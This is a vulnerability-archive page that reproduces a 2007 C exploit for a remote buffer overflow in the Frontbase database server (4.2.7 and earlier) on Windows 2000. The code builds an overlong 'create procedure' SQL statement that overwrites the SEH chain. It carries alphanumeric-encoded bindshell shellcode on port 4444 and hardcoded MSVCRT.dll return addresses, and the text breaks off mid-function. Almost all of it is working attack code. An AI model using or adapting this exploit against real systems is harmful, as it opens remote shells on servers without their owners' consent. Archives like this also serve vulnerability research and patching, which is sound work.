Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Frontbase <= 4.2.7 Remote Buffer Overflow Exploit (windows)

🗓️ 26 Mar 2007 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 17 Views

Frontbase <= 4.2.7 Remote Buffer Overflow on Windows targe

Code

                                                /*&nbsp;Dreatica-FXP&nbsp;crew
*&nbsp;
*&nbsp;----------------------------------------
*&nbsp;Target&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;Frontbase&nbsp;<=&nbsp;4.2.7&nbsp;for&nbsp;Windows
*&nbsp;Site&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;http://www.frontbase.com
*&nbsp;Found&nbsp;by&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;Netragard,&nbsp;L.L.C&nbsp;Advisory
*&nbsp;----------------------------------------
*&nbsp;Exploit&nbsp;date&nbsp;&nbsp;&nbsp;:&nbsp;25.03.2007
*&nbsp;Exploit&nbsp;writer&nbsp;:&nbsp;Heretic2&nbsp;([email protected])
*&nbsp;OS&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;Windows&nbsp;2000&nbsp;SP4&nbsp;(will&nbsp;add&nbsp;other&nbsp;later)
*&nbsp;Crew&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;Dreatica-FXP
*&nbsp;----------------------------------------
*&nbsp;Info:
*&nbsp;&nbsp;&nbsp;&nbsp;The&nbsp;last&nbsp;Windows&nbsp;version&nbsp;of&nbsp;Frontbase&nbsp;that&nbsp;you&nbsp;can&nbsp;found&nbsp;on&nbsp;official&nbsp;site&nbsp;www.frontbase.com
*&nbsp;is&nbsp;the&nbsp;4.2.7d&nbsp;and&nbsp;this&nbsp;version&nbsp;is&nbsp;patched,&nbsp;so&nbsp;the&nbsp;exploit&nbsp;will&nbsp;not&nbsp;work&nbsp;here,&nbsp;i&nbsp;have&nbsp;tested&nbsp;that&nbsp;
*&nbsp;exploit&nbsp;on&nbsp;the&nbsp;4.2.7&nbsp;version&nbsp;under&nbsp;Windows&nbsp;2000&nbsp;SP4&nbsp;(not&nbsp;patched)&nbsp;and&nbsp;it&nbsp;is&nbsp;working&nbsp;good.
*&nbsp;
*&nbsp;The&nbsp;exploitation,&nbsp;as&nbsp;said&nbsp;in&nbsp;advisory,&nbsp;of&nbsp;this&nbsp;bug&nbsp;is&nbsp;easy:&nbsp;SEH&nbsp;and&nbsp;EIP&nbsp;overwrite&nbsp;methods.
*&nbsp;but&nbsp;in&nbsp;\'real\'&nbsp;life&nbsp;the&nbsp;exploitation&nbsp;is&nbsp;more&nbsp;difficult,&nbsp;cause&nbsp;the&nbsp;server&nbsp;allows&nbsp;only&nbsp;alphanumeric
*&nbsp;bytes,&nbsp;like:&nbsp;0x01&nbsp;0x02&nbsp;...&nbsp;0x7e&nbsp;0x7f&nbsp;.
*&nbsp;other&nbsp;bytes:&nbsp;0x80&nbsp;...&nbsp;0xff&nbsp;come&nbsp;to&nbsp;server&nbsp;transformed:
*&nbsp;&nbsp;0xEB&nbsp;will&nbsp;transform&nbsp;in&nbsp;two&nbsp;bytes&nbsp;0xC2&nbsp;0xAB
*&nbsp;&nbsp;0xFF&nbsp;will&nbsp;transform&nbsp;in&nbsp;two&nbsp;bytes&nbsp;0xC3&nbsp;0xBF
*&nbsp;and&nbsp;etc...
*&nbsp;
*&nbsp;so&nbsp;the&nbsp;exploitation&nbsp;become&nbsp;more&nbsp;difficult&nbsp;here,&nbsp;however&nbsp;in&nbsp;one&nbsp;place&nbsp;of&nbsp;buffer&nbsp;i&nbsp;send&nbsp;to&nbsp;the&nbsp;server&nbsp;byte&nbsp;
*&nbsp;0xff,&nbsp;with&nbsp;assumptions&nbsp;that&nbsp;i&nbsp;will&nbsp;get&nbsp;the&nbsp;bytes&nbsp;0xC3&nbsp;0xBF&nbsp;and&nbsp;that&nbsp;the&nbsp;buffer&nbsp;will&nbsp;be&nbsp;one&nbsp;byte&nbsp;longer.
*&nbsp;
*&nbsp;for&nbsp;the&nbsp;correct&nbsp;exploitation&nbsp;i&nbsp;used&nbsp;some&nbsp;code&nbsp;from&nbsp;win32&nbsp;SEH&nbsp;GetPC&nbsp;project&nbsp;and&nbsp;metasploit&nbsp;for&nbsp;the&nbsp;shellcodes.
*&nbsp;
*&nbsp;so&nbsp;the&nbsp;exploit&nbsp;is:
*&nbsp;&nbsp;&nbsp;&nbsp;send&nbsp;3115&nbsp;bytes&nbsp;to&nbsp;server&nbsp;+&nbsp;address&nbsp;to&nbsp;overwrite&nbsp;SEH.
*&nbsp;&nbsp;&nbsp;&nbsp;in&nbsp;my&nbsp;case&nbsp;i&nbsp;sent&nbsp;3114&nbsp;bytes,&nbsp;cause&nbsp;one&nbsp;0xff&nbsp;transformed&nbsp;in&nbsp;2&nbsp;symbols
*&nbsp;
*&nbsp;----------------------------------------
*&nbsp;Compiling:
*&nbsp;&nbsp;To&nbsp;compile&nbsp;this&nbsp;exploit&nbsp;you&nbsp;need:
*&nbsp;&nbsp;&nbsp;&nbsp;1.&nbsp;C:usrFrontBaseIncludeFBCAccess&nbsp;copy&nbsp;to&nbsp;exploit&nbsp;folder.
*&nbsp;&nbsp;&nbsp;&nbsp;2.&nbsp;Copy&nbsp;from&nbsp;C:usrFrontBaselib&nbsp;file&nbsp;FBCAccess.lib&nbsp;to&nbsp;your&nbsp;exploit&nbsp;folder.
*&nbsp;&nbsp;&nbsp;&nbsp;3.&nbsp;Select&nbsp;FBCAccess.lib&nbsp;in&nbsp;linker&nbsp;options
*&nbsp;&nbsp;&nbsp;&nbsp;4.&nbsp;Compile.
*&nbsp;----------------------------------------
*&nbsp;Thanks&nbsp;to:
*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Netragard,&nbsp;L.L.C&nbsp;Advisory&nbsp;&nbsp;&nbsp;(&nbsp;http://www.netragard.com&nbsp;--&nbsp;\"We&nbsp;make&nbsp;I.T.&nbsp;Safe.\"&nbsp;)
*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;The&nbsp;Metasploit&nbsp;project&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(&nbsp;http://metasploit.com&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;)&nbsp;
*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;win32&nbsp;SEH&nbsp;GetPC&nbsp;project&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;)&nbsp;
*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Dreatica-FXP&nbsp;crew&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;)
*&nbsp;----------------------------------------
*
*/

#include&nbsp;<stdio.h>
#include&nbsp;<stdlib.h>
#include&nbsp;<string.h>
#include&nbsp;<winsock2.h>
#pragma&nbsp;comment(lib,\"ws2_32\")
#include&nbsp;\"FBCAccess/FBCAccess.h\"

void&nbsp;usage(char&nbsp;*&nbsp;s);
void&nbsp;logo();
void&nbsp;prepare_shellcode(unsigned&nbsp;char&nbsp;*&nbsp;fsh,&nbsp;int&nbsp;sh);
void&nbsp;make_buffer(char&nbsp;*&nbsp;buf,&nbsp;int&nbsp;itarget,&nbsp;int&nbsp;sh);
int&nbsp;&nbsp;validate_args(&nbsp;int&nbsp;port,&nbsp;int&nbsp;sh,&nbsp;int&nbsp;itarget);
int&nbsp;&nbsp;send_buffer(char&nbsp;*&nbsp;host,&nbsp;int&nbsp;port,&nbsp;char&nbsp;*&nbsp;user,&nbsp;char&nbsp;*&nbsp;password,&nbsp;char&nbsp;*&nbsp;dbpassword,&nbsp;char&nbsp;*&nbsp;database,&nbsp;char&nbsp;*&nbsp;buf);

//&nbsp;-----------------------------------------------------------------
//&nbsp;XGetopt.cpp&nbsp;&nbsp;Version&nbsp;1.2
//&nbsp;-----------------------------------------------------------------
int&nbsp;getopt(int&nbsp;argc,&nbsp;char&nbsp;*argv[],&nbsp;char&nbsp;*optstring);
char	*optarg;		//&nbsp;global&nbsp;argument&nbsp;pointer
int		optind&nbsp;=&nbsp;0,&nbsp;opterr;&nbsp;	//&nbsp;global&nbsp;argv&nbsp;index
//&nbsp;-----------------------------------------------------------------
//&nbsp;-----------------------------------------------------------------

struct&nbsp;{
	const&nbsp;char&nbsp;*t&nbsp;;
	unsigned&nbsp;long&nbsp;ret&nbsp;;
}&nbsp;targets[]=&nbsp;
		{								
			//&nbsp;we&nbsp;need&nbsp;alphanumeric&nbsp;addreses&nbsp;so&nbsp;this&nbsp;one&nbsp;found&nbsp;in&nbsp;MSVCRT.dll&nbsp;(there&nbsp;are&nbsp;a&nbsp;lot&nbsp;in&nbsp;it)&nbsp;
			{\"Windows&nbsp;2000&nbsp;SP4&nbsp;no&nbsp;patches,&nbsp;MSVCRT.dll\",				0x78014c40&nbsp;},//pop,&nbsp;pop,&nbsp;ret
			{\"Windows&nbsp;2000&nbsp;SP4&nbsp;no&nbsp;pathces,&nbsp;MSVCRT.dll\",						0x7803382b&nbsp;},//jmp&nbsp;ebx
			{NULL,													0x00000000&nbsp;}
		};

struct&nbsp;{
	const&nbsp;char&nbsp;*&nbsp;name;
	char&nbsp;*&nbsp;shellcode;
}shellcodes[]={&nbsp;	
	&nbsp;{\"Spawn&nbsp;bindshell&nbsp;on&nbsp;port&nbsp;4444\",&nbsp;
		&nbsp;/*&nbsp;modified&nbsp;win32_bind&nbsp;-&nbsp;&nbsp;EXITFUNC=seh&nbsp;LPORT=4444&nbsp;Encoder=Alpha2&nbsp;http://metasploit.com&nbsp;
		&nbsp;&nbsp;&nbsp;&nbsp;first&nbsp;jmp&nbsp;instructions&nbsp;replaced&nbsp;by&nbsp;alphanumeric&nbsp;code&nbsp;taken&nbsp;from&nbsp;the&nbsp;win32&nbsp;SEH&nbsp;GetPC&nbsp;project.&nbsp;*/
		\"x56x54x58x36x33x30x56x58x48x34x39x48x48x48x50x68\"
		\"x59x41x41x51x68x5Ax59x59x59x59x41x41x51x51x44x44\"
		\"x44x64x33x36x46x46x46x46x54x58x56x6Ax30x50x50x54\"
		\"x55x50x50x61x33x30x31x30x38x39x49x49x49x49x49x49\"
		\"x49x49x49x49x49x37x49x49x49x49x49x49x51x5ax6ax66\"
		\"x58x30x42x31x50x41x42x6bx42x41x76x32x42x42x32x41\"
		\"x41x30x41x41x42x58x50x38x42x42x75x38x69x39x6cx52\"
		\"x4ax5ax4bx42x6dx68x68x48x79x4bx4fx6bx4fx4bx4fx65\"
		\"x30x6cx4bx30x6cx31x34x71x34x4ex6bx42x65x65x6cx6e\"
		\"x6bx53x4cx43x35x62x58x55x51x4ax4fx4ex6bx72x6fx54\"
		\"x58x6cx4bx51x4fx77x50x53x31x78x6bx43x79x4ex6bx54\"
		\"x74x6cx4bx35x51x6ax4ex64x71x6fx30x6ex79x6ex4cx6d\"
		\"x54x6fx30x64x34x55x57x4fx31x59x5ax36x6dx36x61x59\"
		\"x52x5ax4bx4cx34x37x4bx62x74x47x54x46x48x70x75x4d\"
		\"x35x6cx4bx73x6fx64x64x33x31x4ax4bx43x56x4cx4bx44\"
		\"x4cx62x6bx6ex6bx63x6fx57x6cx65x51x6ax4bx77x73x56\"
		\"x4cx6cx4bx6ex69x62x4cx44x64x45x4cx55x31x6fx33x44\"
		\"x71x6bx6bx51x74x4ex6bx53x73x30x30x4ex6bx57x30x34\"
		\"x4cx6cx4bx64x30x37x6cx4ex4dx6cx4bx53x70x73x38x73\"
		\"x6ex30x68x4cx4ex62x6ex74x4ex38x6cx30x50x79x6fx6a\"
		\"x76x51x76x30x53x42x46x72x48x35x63x45x62x33x58x64\"
		\"x37x64x33x74x72x43x6fx33x64x4bx4fx78x50x52x48x38\"
		\"x4bx7ax4dx4bx4cx57x4bx62x70x69x6fx6ex36x71x4fx6e\"
		\"x69x4bx55x33x56x6cx41x4ax4dx76x68x74x42x63x65x51\"
		\"x7ax77x72x4bx4fx4ax70x63x58x6ex39x35x59x6bx45x4e\"
		\"x4dx30x57x4bx4fx38x56x50x53x50x53x42x73x51x43x70\"
		\"x53x70x43x32x73x52x63x76x33x59x6fx6ex30x55x36x33\"
		\"x58x76x71x71x4cx63x56x56x33x6ex69x59x71x4ex75x55\"
		\"x38x4cx64x55x4ax72x50x6bx77x56x37x4bx4fx4ex36x53\"
		\"x5ax56x70x32x71x33x65x69x6fx4ex30x62x48x39x34x4c\"
		\"x6dx74x6ex4ax49x63x67x69x6fx79x46x43x63x36x35x6b\"
		\"x4fx68x50x35x38x5ax45x70x49x6dx56x70x49x41x47x6b\"
		\"x4fx68x56x56x30x41x44x33x64x71x45x69x6fx4ex30x4d\"
		\"x43x53x58x5ax47x70x79x6bx76x73x49x41x47x49x6fx4e\"
		\"x36x63x65x4bx4fx4ex30x53x56x50x6ax35x34x53x56x41\"
		\"x78x61x73x30x6dx4cx49x4bx55x72x4ax72x70x76x39x45\"
		\"x79x58x4cx6bx39x59x77x31x7ax67x34x4cx49x49x72x70\"
		\"x31x6fx30x6cx33x6fx5ax69x6ex72x62x36x4dx4bx4ex53\"
		\"x72x34x6cx6ax33x6ex6dx62x5ax36x58x6cx6bx4cx6bx4e\"
		\"x4bx61x78x30x72x6bx4ex6dx63x46x76x4bx4fx44x35x32\"
		\"x64x39x6fx38x56x51x4bx70x57x52x72x70x51x32x71x53\"
		\"x61x42x4ax43x31x56x31x46x31x70x55x43x61x79x6fx6a\"
		\"x70x62x48x6ex4dx59x49x67x75x7ax6ex33x63x39x6fx59\"
		\"x46x63x5ax59x6fx4bx4fx76x57x6bx4fx6ax70x4cx4bx61\"
		\"x47x59x6cx6bx33x38x44x43x54x49x6fx58x56x36x32x59\"
		\"x6fx4ex30x43x58x68x70x4fx7ax54x44x73x6fx71x43x4b\"
		\"x4fx4ex36x6bx4fx78x50x66\"
	&nbsp;},	&nbsp;
	{NULL&nbsp;,&nbsp;NULL&nbsp;}
};

//&nbsp;alphanumeric&nbsp;long&nbsp;back&nbsp;jump,&nbsp;using&nbsp;SEH&nbsp;method!
char&nbsp;jmptoshellcode[]=
	//&nbsp;at&nbsp;the&nbsp;time&nbsp;of&nbsp;jump&nbsp;we&nbsp;have&nbsp;in&nbsp;EBX&nbsp;the&nbsp;address&nbsp;where&nbsp;we&nbsp;jumped&nbsp;after&nbsp;SEH&nbsp;exploitation
	//&nbsp;so&nbsp;we&nbsp;can&nbsp;use&nbsp;it&nbsp;to&nbsp;jump&nbsp;[EBX-0C20]
	\"x56x54x58x36x33x30x56x58x50x50x5fx53x58x66x2dx20\"&nbsp;
	\"x0Cx50x59x58x64x33x3fx64x31x38x51x57x64x31x20x6c\";


int&nbsp;main(int&nbsp;argc,&nbsp;char&nbsp;**argv)
{
	char&nbsp;temp1[100],&nbsp;temp2[100];
	char&nbsp;*&nbsp;remotehost=NULL,&nbsp;*&nbsp;user=NULL,&nbsp;*&nbsp;password=NULL,&nbsp;*&nbsp;database=NULL,&nbsp;*&nbsp;dbpassword=NULL;
	char&nbsp;default_remotehost[]=\"127.0.0.1\";
	char&nbsp;default_user[]=\"_SYSTEM\";
	char&nbsp;default_password[]=\"\";
	char&nbsp;default_database[]=\"\";
	char&nbsp;default_dbpassword[]=\"\";
	int&nbsp;port,&nbsp;itarget,&nbsp;sh;
	char&nbsp;c;		
	logo();
	if(argc<2)
	{
		usage(argv[0]);		
		return&nbsp;-1;
	}
	//&nbsp;set&nbsp;defaults		
	port=-1;
	itarget=0;
	sh=0;
	//&nbsp;------------		
	while((c&nbsp;=&nbsp;getopt(argc,&nbsp;argv,&nbsp;\"h:p:s:t:u:P:d:D:\"))!=&nbsp;EOF)
	{
		switch&nbsp;(c)
		{
			case&nbsp;\'h\':
				remotehost=optarg;
				break;&nbsp;	
			case&nbsp;\'s\':
				sscanf(optarg,&nbsp;\"%d\",&nbsp;&sh);
				sh--;
				break;
			case&nbsp;\'t\':
				sscanf(optarg,&nbsp;\"%d\",&nbsp;&itarget);
				itarget--;
				break;
			case&nbsp;\'p\':
				sscanf(optarg,&nbsp;\"%d\",&nbsp;&port);
				break;		
			case&nbsp;\'u\':
				user=optarg;
				break;&nbsp;
			case&nbsp;\'P\':
				password=optarg;
				break;&nbsp;
			case&nbsp;\'d\':
				database=optarg;
				break;&nbsp;
			default:
	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;usage(argv[0]);
			return&nbsp;-1;
		}		
	}
	if(validate_args(&nbsp;port,&nbsp;sh,&nbsp;itarget)==-1)&nbsp;return&nbsp;-1;
	if(remotehost&nbsp;==&nbsp;NULL)&nbsp;remotehost=default_remotehost;
	if(user&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;==&nbsp;NULL)&nbsp;user=default_user;
	if(password&nbsp;&nbsp;&nbsp;==&nbsp;NULL)&nbsp;password=default_password;
	if(dbpassword&nbsp;==&nbsp;NULL)&nbsp;dbpassword=default_dbpassword;
	if(database&nbsp;&nbsp;&nbsp;==&nbsp;NULL)&nbsp;database=default_database;

	memset(temp1,0,sizeof(temp1));
	memset(temp2,0,sizeof(temp2));
	memset(temp1,&nbsp;\'x20\'&nbsp;,&nbsp;58&nbsp;-&nbsp;strlen(remotehost)&nbsp;-1);	
	printf(\"&nbsp;#&nbsp;&nbsp;Host&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;%s%s#&nbsp;
\",&nbsp;remotehost,&nbsp;temp1);	
	if(port!=-1)
	{
		sprintf(temp2,&nbsp;\"%d\",&nbsp;port);
		memset(temp1,0,sizeof(temp1));
		memset(temp1,&nbsp;\'x20\'&nbsp;,&nbsp;58&nbsp;-&nbsp;strlen(temp2)&nbsp;-1);
		printf(\"&nbsp;#&nbsp;&nbsp;Port&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;%s%s#&nbsp;
\",&nbsp;temp2,&nbsp;temp1);
	}else
	{
		sprintf(temp2,&nbsp;\"%s\",&nbsp;database);
		memset(temp1,0,sizeof(temp1));
		memset(temp1,&nbsp;\'x20\'&nbsp;,&nbsp;58&nbsp;-&nbsp;strlen(temp2)&nbsp;-1);
		printf(\"&nbsp;#&nbsp;&nbsp;Database:&nbsp;%s%s#&nbsp;
\",&nbsp;temp2,&nbsp;temp1);
	}
	sprintf(temp2,&nbsp;\"%s\",&nbsp;user);
	memset(temp1,0,sizeof(temp1));
	memset(temp1,&nbsp;\'x20\'&nbsp;,&nbsp;58&nbsp;-&nbsp;strlen(temp2)&nbsp;-1);
	printf(\"&nbsp;#&nbsp;&nbsp;User&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;%s%s#&nbsp;
\",&nbsp;temp2,&nbsp;temp1);
	sprintf(temp2,&nbsp;\"%s\",&nbsp;database);
	memset(temp1,0,sizeof(temp1));
	memset(temp1,&nbsp;\'x20\'&nbsp;,&nbsp;58&nbsp;-&nbsp;strlen(temp2)&nbsp;-1);
	printf(\"&nbsp;#&nbsp;&nbsp;Database:&nbsp;%s%s#&nbsp;
\",&nbsp;temp2,&nbsp;temp1);
	memset(temp1,0,sizeof(temp1));	
	memset(temp2,0,sizeof(temp2));
	sprintf(temp2,&nbsp;\"%s\",&nbsp;shellcodes[sh].name&nbsp;);
	memset(temp1,&nbsp;\'x20\'&nbsp;,&nbsp;58&nbsp;-&nbsp;strlen(temp2)&nbsp;-1);	
	printf(\"&nbsp;#&nbsp;&nbsp;Shellcde:&nbsp;%s%s#&nbsp;
\",&nbsp;temp2,&nbsp;temp1);	
	memset(temp1,0,sizeof(temp1));	
	memset(temp1,&nbsp;\'x20\'&nbsp;,&nbsp;58&nbsp;-&nbsp;strlen(targets[itarget].t)&nbsp;-1);	
	printf(\"&nbsp;#&nbsp;&nbsp;Target&nbsp;&nbsp;:&nbsp;%s%s#&nbsp;
\",&nbsp;targets[itarget].t,&nbsp;temp1);	
	printf(\"&nbsp;#&nbsp;-------------------------------------------------------------------&nbsp;#&nbsp;
\");
	fflush(stdout);
	
	char&nbsp;buf[20000];
	memset(buf,0,sizeof(buf));
	printf(\"[+]&nbsp;Constructing&nbsp;attacking&nbsp;buffer...&nbsp;\");
	fflush(stdout);
	make_buffer((char&nbsp;*)buf,itarget,sh);
	printf(\"done
\");

	if(send_buffer(remotehost,port,&nbsp;user,&nbsp;password,&nbsp;dbpassword,&nbsp;database,&nbsp;buf)==-1)
	{
		fprintf(stdout,&nbsp;\"[-]&nbsp;Cannot&nbsp;exploit&nbsp;server&nbsp;%s
\",&nbsp;remotehost);		
		return&nbsp;-1;
	}
	return&nbsp;0;
}

int&nbsp;validate_args(int&nbsp;port,&nbsp;int&nbsp;sh,&nbsp;int&nbsp;itarget)
{
	int&nbsp;i=0,x=0;
	for(i=0;shellcodes[i].name;i++)if(i==sh)x=1;
&nbsp;&nbsp;&nbsp;&nbsp;if(x==0)
	{
		printf(\"[-]&nbsp;The&nbsp;shellcode&nbsp;number&nbsp;is&nbsp;invalid
\");
		return&nbsp;-1;
	}	
	x=0;
	for(i=0;targets[i].t;i++)if(i==itarget)x=1;
	if(x==0)
	{
		printf(\"[-]&nbsp;The&nbsp;target&nbsp;is&nbsp;invalid
\");
		return&nbsp;-1;
	}	
	return&nbsp;1;
}

void&nbsp;prepare_shellcode(&nbsp;char&nbsp;*&nbsp;fsh,&nbsp;int&nbsp;sh)
{
	memcpy(fsh,&nbsp;shellcodes[sh].shellcode,&nbsp;strlen(shellcodes[sh].shellcode));	
}

void&nbsp;make_buffer(char&nbsp;*&nbsp;buf,&nbsp;int&nbsp;itarget,&nbsp;int&nbsp;sh)
{
	//&nbsp;-=[&nbsp;prepare&nbsp;shellcode&nbsp;]=-
	char&nbsp;*&nbsp;fsh;
	fsh&nbsp;=&nbsp;(char&nbsp;*)&nbsp;malloc&nbsp;((strlen(shellcodes[sh].shellcode)+1)&nbsp;);
	memset(fsh,&nbsp;0,&nbsp;(strlen(shellcodes[sh].shellcode)+1));	
	prepare_shellcode(fsh,&nbsp;sh);
	//&nbsp;-----------------
	
&nbsp;&nbsp;&nbsp;&nbsp;//&nbsp;-=[&nbsp;fill&nbsp;buffer&nbsp;here&nbsp;&nbsp;]=-
	memset(buf,0,sizeof(buf));
	char&nbsp;*&nbsp;cp&nbsp;=&nbsp;buf;

		//&nbsp;make&nbsp;vulnerable&nbsp;sql92&nbsp;command&nbsp;to&nbsp;get&nbsp;exploit
	strcat(buf,&nbsp;\"create&nbsp;procedure&nbsp;\"\");
	cp=buf+strlen(buf);	

		//&nbsp;some&nbsp;useless&nbsp;bytes
	memset(cp,&nbsp;\'A\',&nbsp;7);&nbsp;&nbsp;
	cp+=strlen((char&nbsp;*)cp);

		//&nbsp;shellcode
	memcpy(cp,&nbsp;fsh,&nbsp;strlen(fsh));
	cp+=strlen((char&nbsp;*)cp);

		//&nbsp;fill&nbsp;after&nbsp;shellcode
	memset(cp,&nbsp;\'A\',&nbsp;3045-strlen(fsh));&nbsp;&nbsp;
	cp+=strlen((char&nbsp;*)cp);

		//&nbsp;alphanumeric&nbsp;long&nbsp;jump&nbsp;to&nbsp;our&nbsp;shellcode&nbsp;at&nbsp;the&nbsp;start&nbsp;of&nbsp;the&nbsp;buffer
	memcpy(cp,&nbsp;jmptoshellcode,&nbsp;strlen(jmptoshellcode));
	cp+=strlen((char&nbsp;*)cp);
	memset(cp,&nbsp;\'A\',&nbsp;59-strlen(jmptoshellcode));&nbsp;&nbsp;
	cp+=strlen((char&nbsp;*)cp);
	
		//&nbsp;at&nbsp;this&nbsp;place&nbsp;in&nbsp;stack&nbsp;points&nbsp;EBX&nbsp;and&nbsp;RET&nbsp;will&nbsp;go&nbsp;here,&nbsp;so&nbsp;we&nbsp;need&nbsp;to&nbsp;jmp&nbsp;upper&nbsp;
		//&nbsp;to&nbsp;prepare&nbsp;alphanumeric&nbsp;long&nbsp;jump

	*cp++&nbsp;=&nbsp;\'x74\';&nbsp;//&nbsp;JNE&nbsp;...&nbsp;at&nbsp;this&nbsp;point&nbsp;JNE&nbsp;will&nbsp;jump&nbsp;cause&nbsp;the&nbsp;last&nbsp;CMP&nbsp;was&nbsp;\'not&nbsp;equal\'
	*cp++&nbsp;=&nbsp;\'xff\';&nbsp;//&nbsp;this&nbsp;is&nbsp;not&nbsp;alphanumeric&nbsp;,&nbsp;but&nbsp;the&nbsp;server&nbsp;will&nbsp;transform&nbsp;xff&nbsp;->&nbsp;xC3xBF
					//&nbsp;so&nbsp;this&nbsp;will&nbsp;give&nbsp;us&nbsp;the&nbsp;JNE&nbsp;C3&nbsp;and&nbsp;we&nbsp;will&nbsp;jump&nbsp;upper&nbsp;for&nbsp;59&nbsp;bytes
					//&nbsp;where&nbsp;we&nbsp;put&nbsp;a&nbsp;longer&nbsp;jump&nbsp;to&nbsp;our&nbsp;shellcode.&nbsp;This&nbsp;will&nbsp;add&nbsp;one&nbsp;byte&nbsp;more&nbsp;
					//&nbsp;so&nbsp;we&nbsp;will&nbsp;send&nbsp;not&nbsp;3115,&nbsp;but&nbsp;3114&nbsp;bytes&nbsp;to&nbsp;overwrite&nbsp;SEH.
	*cp++&nbsp;=&nbsp;\'x41\';&nbsp;

		//&nbsp;SEH&nbsp;chain&nbsp;overwrite
	*cp++&nbsp;=&nbsp;(char)((targets[itarget].ret&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;)&nbsp;&&nbsp;0xff);
	*cp++&nbsp;=&nbsp;(char)((targets[itarget].ret&nbsp;>>&nbsp;&nbsp;8)&nbsp;&&nbsp;0xff);
	*cp++&nbsp;=&nbsp;(char)((targets[itarget].ret&nbsp;>>&nbsp;16)&nbsp;&&nbsp;0xff);
	*cp++&nbsp;=&nbsp;(char)((targets[itarget].ret&nbsp;>>&nbsp;24)&nbsp;&&nbsp;0xff);
	
		//&nbsp;end&nbsp;of&nbsp;the&nbsp;sql92&nbsp;command
	memcpy(cp,&nbsp;\"\"()
&nbsp;begin
&nbsp;end;\",&nbsp;strlen(\"\"()
&nbsp;begin
&nbsp;end;\"));

	//&nbsp;-----------------
}

int&nbsp;send_buffer(char&nbsp;*&nbsp;host,&nbsp;int&nbsp;port,&nbsp;char&nbsp;*&nbsp;user,&nbsp;char&nbsp;*&nbsp;password,&nbsp;char&nbsp;*&nbsp;dbpassword,&nbsp;char&nbsp;*&nbsp;database,&nbsp;char&nbsp;*&nbsp;buf)
{
	FBCDatabaseConnection&nbsp;*&nbsp;fbdc;
	FBCMetaData&nbsp;*meta;
	char&nbsp;sesn[]=\"dreatica-fxp\";&nbsp;&nbsp;&nbsp;
	if(database!=NULL)&nbsp;port&nbsp;=&nbsp;-1;
	fbcInitialize();	
&nbsp;&nbsp;&nbsp;	if&nbsp;(port!=-1)
	{
		printf(\"[+]&nbsp;Connecting&nbsp;to&nbsp;%s:%d
\",&nbsp;host,&nbsp;port);
		fbdc&nbsp;=&nbsp;fbcdcConnectToDatabaseUsingPort(host,&nbsp;port,&nbsp;dbpassword);&nbsp;
	}else
	{
		printf(\"[+]&nbsp;Connecting&nbsp;to&nbsp;%s&nbsp;to&nbsp;database&nbsp;%s
\",&nbsp;host,&nbsp;database);
		fbdc&nbsp;=&nbsp;fbcdcConnectToDatabase(database,&nbsp;host,&nbsp;dbpassword);
	}
	if&nbsp;(fbdc&nbsp;==&nbsp;NULL)
	{
		printf(\"[-]&nbsp;Cannot&nbsp;connect&nbsp;to&nbsp;%s
\",&nbsp;host);
		return&nbsp;-1;
	}	
	char&nbsp;*&nbsp;session_name=sesn;
